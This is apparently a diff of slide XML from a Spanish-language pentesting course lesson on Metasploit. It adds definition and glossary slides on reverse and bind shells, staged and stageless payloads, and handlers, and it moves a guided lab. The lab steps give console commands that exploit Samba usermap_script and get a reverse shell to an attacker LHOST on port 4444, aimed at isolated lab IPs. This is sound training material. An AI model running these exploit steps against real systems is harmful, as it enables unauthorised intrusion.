+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  desbordamiento mal ajustado cierra el proceso—, lo que en un pentest es un incidente que se</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  factura en confianza.</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4331,7 +4707,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>🧰 Herramientas y preparación</a:t>
+              <a:t>📖 Definiciones y características</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4369,37 +4745,82 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  Metasploit Framework y Metasploitable2/3 desplegadas en la misma red interna aislada (host-only) que en la clase anterior.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Confirmar la IP de la máquina atacante (ip a en Kali) antes de configurar LHOST — un error aquí es la causa número uno de exploits fallidos.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Workspace de Metasploit ya poblado con hosts y servicios desde la clase 072 (dbnmap, hosts, services).</a:t>
+              <a:t>•  Reverse shell: conexión donde la máquina víctima se conecta hacia el atacante. Característica clave: atraviesa firewalls que permiten tráfico saliente pero bloquean el entrante, el escenario más…</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Bind shell: conexión donde el atacante se conecta a un puerto abierto por la víctima. Característica clave: falla si existe un firewall de entrada entre atacante y víctima.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Payload staged: payload identificado con / en su nombre (ej. windows/meterpreter/reversetcp) que envía primero un stager pequeño y luego descarga el resto. Característica clave: menor tamaño inicial…</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Payload stageless: payload identificado con  (ej. windows/meterpreterreversetcp) que se envía completo en un solo bloque. Característica clave: más fiable en redes inestables o con filtrado agresivo…</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Handler (exploit/multi/handler): módulo genérico que escucha la conexión que hará el payload una vez ejecutado en la víctima. Característica clave: debe configurarse con el mismo tipo de payload…</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  check: comando de Metasploit que verifica si el objetivo es vulnerable sin lanzar la explotación completa. Característica clave: no todos los módulos lo implementan, pero cuando existe reduce el…</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4450,7 +4871,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>🧪 Laboratorio guiado</a:t>
+              <a:t>📔 Glosario</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4488,97 +4909,97 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  Objetivo 192.168.56.101 (Metasploitable2), atacante Kali 192.168.56.10 (ajustar según tu red de laboratorio).</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Selecciona un exploit conocido y documentado de Metasploitable2, por ejemplo el de Samba: use exploit/multi/samba/usermapscript.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Fija el objetivo: set RHOSTS 192.168.56.101.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Lista los payloads compatibles con el exploit seleccionado: show payloads.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Elige un payload reverse y configúralo: set PAYLOAD cmd/unix/reverse, set LHOST 192.168.56.10, set LPORT 4444.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Revisa todas las opciones antes de disparar: options.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Si el módulo lo soporta, verifica sin explotar: check.</a:t>
+              <a:t>•  Término — Definición concisa</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Emparejamiento exploit-vulnerabilidad — El exploit debe coincidir con la versión y arquitectura exactas</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  check — Verifica la condición vulnerable sin ejecutar el ataque</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Target — Variante del exploit según sistema, versión y arquitectura</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Reverse shell — El objetivo conecta hacia el atacante; atraviesa NAT/firewall</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Bind shell — El objetivo abre un puerto; el atacante se conecta</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  LHOST / LPORT — Dirección y puerto de escucha del atacante</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4629,7 +5050,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>✍️ Ejercicios</a:t>
+              <a:t>🧰 Herramientas y preparación</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4667,97 +5088,37 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  Explica con un ejemplo concreto en qué escenario un reverse shell es imprescindible frente a un bind shell.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Cambia un payload staged por su equivalente stageless en show payloads y describe la diferencia visible en el nombre y el tamaño.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Provoca un fallo de explotación poniendo un LHOST incorrecto y documenta el síntoma exacto observado en consola.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Usa check en un módulo que lo soporte y en uno que no lo soporte; documenta la diferencia de comportamiento.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Obtén dos sesiones simultáneas contra el mismo objetivo (usando dos exploits distintos) y practica moverte entre ellas con sessions -i.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Explica por qué el handler debe coincidir exactamente con el payload usado en el exploit, incluyendo arquitectura y formato.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Investiga y documenta, desde la perspectiva defensiva, qué patrón de tráfico de red generaría un IDS/IPS al detectar una conexión reverse shell hacia un puerto no estándar como el 4444.</a:t>
+              <a:t>•  Metasploit Framework y Metasploitable2/3 desplegadas en la misma red interna aislada (host-only) que en la clase anterior.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Confirmar la IP de la máquina atacante (ip a en Kali) antes de configurar LHOST — un error aquí es la causa número uno de exploits fallidos.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Workspace de Metasploit ya poblado con hosts y servicios desde la clase 072 (dbnmap, hosts, services).</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4808,7 +5169,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>📝 Reto verificable</a:t>
+              <a:t>🧪 Laboratorio guiado</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4846,22 +5207,97 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  Reto: Obtener una sesión interactiva en la VM de laboratorio mediante un exploit real de Metasploit y demostrar ejecución de comandos en el sistema comprometido.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Criterio de aceptación: sessions -l muestra al menos una sesión activa contra el objetivo de laboratorio; se ejecuta id (o equivalente) mostrando el usuario obtenido en la víctima; y se documenta por escrito el exploit usado, el payload configurado y las opciones exactas (RHOSTS, LHOST, LPORT). Todo el ejercicio se realiza contra una IP de laboratorio propio.</a:t>
+              <a:t>•  Objetivo 192.168.56.101 (Metasploitable2), atacante Kali 192.168.56.10 (ajustar según tu red de laboratorio).</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Selecciona un exploit conocido y documentado de Metasploitable2, por ejemplo el de Samba: use exploit/multi/samba/usermapscript.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Fija el objetivo: set RHOSTS 192.168.56.101.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Lista los payloads compatibles con el exploit seleccionado: show payloads.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Elige un payload reverse y configúralo: set PAYLOAD cmd/unix/reverse, set LHOST 192.168.56.10, set LPORT 4444.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Revisa todas las opciones antes de disparar: options.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Si el módulo lo soporta, verifica sin explotar: check.</a:t>
             </a:r>
           </a:p>
         </p:txBody>
